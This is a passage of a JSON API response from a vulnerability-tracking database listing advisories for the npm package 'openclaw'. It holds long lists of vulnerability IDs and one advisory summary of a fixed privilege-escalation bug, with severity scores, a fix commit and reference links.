                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5dj5-mk23-kyds"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-66nc-bn98-nbas"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-acy1-83py-efhr"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-utv2-tyje-kfht"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vv2u-u7mn-rfe1"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"
                }
            ],
            "aliases": [
                "GHSA-3gr8-2752-h46q"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-26sv-grsd-abcw"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89951?format=api",
            "vulnerability_id": "VCID-294z-6z8j-97bx",
            "summary": "OpenClaw: Gateway operator.write Can Reach Admin-Class Telegram Config and Cron Persistence via send\n## Summary\nGateway operator.write Can Reach Admin-Class Telegram Config and Cron Persistence via send\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: This is a real, shipped bug that lets operator.write reach admin-class Telegram config or cron persistence, but it is an authenticated, sink-specific escalation, so a severity of high is too high given the narrower scope.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `b7d70ade3b9900dbe97bd73be9c02e924ff3c986` — 2026-03-25T12:12:09-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zpbrent for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41359",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0003",
                            "scoring_system": "epss",
                            "scoring_elements": "0.092",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0003",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09219",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.0003",
                            "scoring_system": "epss",
                            "scoring_elements": "0.09201",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41359"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/b7d70ade3b9900dbe97bd73be9c02e924ff3c986",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:37:35Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/b7d70ade3b9900dbe97bd73be9c02e924ff3c986"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-767m-xrhc-fxm7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:37:35Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-767m-xrhc-fxm7"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41359",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41359"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-operator-write-to-admin-class-telegram-config-and-cron-persistence",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:37:35Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-operator-write-to-admin-class-telegram-config-and-cron-persistence"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-767m-xrhc-fxm7",
                    "reference_id": "GHSA-767m-xrhc-fxm7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-767m-xrhc-fxm7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
